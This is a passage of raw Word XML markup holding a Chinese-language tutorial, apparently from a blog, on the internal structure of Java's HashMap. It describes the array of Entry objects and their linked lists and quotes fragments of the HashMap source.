          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>链表散列</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的数据结构，</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>即数组和链表的结合体</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>。首先，</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>类的属性中定义了</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>类型的数组。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>类实现</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>java.ultil.Map.Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>接口，同时每一对</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>是作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>类的属性被包装在</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的类中。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00D05B99">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如图所示，</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的数据结构：</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00D05B99">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4967251" cy="2961564"/>
            <wp:effectExtent l="19050" t="0" r="4799" b="0"/>
            <wp:docPr id="69" name="图片 17" descr="http://dl.iteye.com/upload/attachment/427014/eab581f9-889f-31e7-9d72-321919d99c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dl.iteye.com/upload/attachment/427014/eab581f9-889f-31e7-9d72-321919d99c37.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4967787" cy="2961884"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>   HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的部分源码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Consolas"/>
          <w:noProof/>
          <w:color w:val="C0C0C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="10"/>
          <w:szCs w:val="10"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="143510" cy="136525"/>
            <wp:effectExtent l="19050" t="0" r="8890" b="0"/>
            <wp:docPr id="68" name="图片 4" descr="收藏代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收藏代码"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="143510" cy="136525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>/**</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> * The table, resized as necessary. Length MUST Always be a power of two.</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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8200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t> */</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>transient</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> Entry[] table;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>static</w:t>
      </w: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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> Entry&lt;K,V&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="006699"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
        </w:rPr>
        <w:t>implements</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> Map.Entry&lt;K,V&gt; {  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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final</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> K key;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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V value;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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Entry&lt;K,V&gt; next;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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final</w:t>
      </w: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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="13"/>
          <w:szCs w:val="13"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t> hash;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>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p>
    <w:p w:rsidR="00744ED7" w:rsidRPr="00744ED7" w:rsidRDefault="00744ED7" w:rsidP="00744ED7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="279" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>可以看出，</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>底层就是一个数组结构，数组中的每一项又是一个链表。当新建一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的时候，就会初始化一个数组。</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>数组的元素是</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>类型的。每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00744ED7">
        <w:rPr>
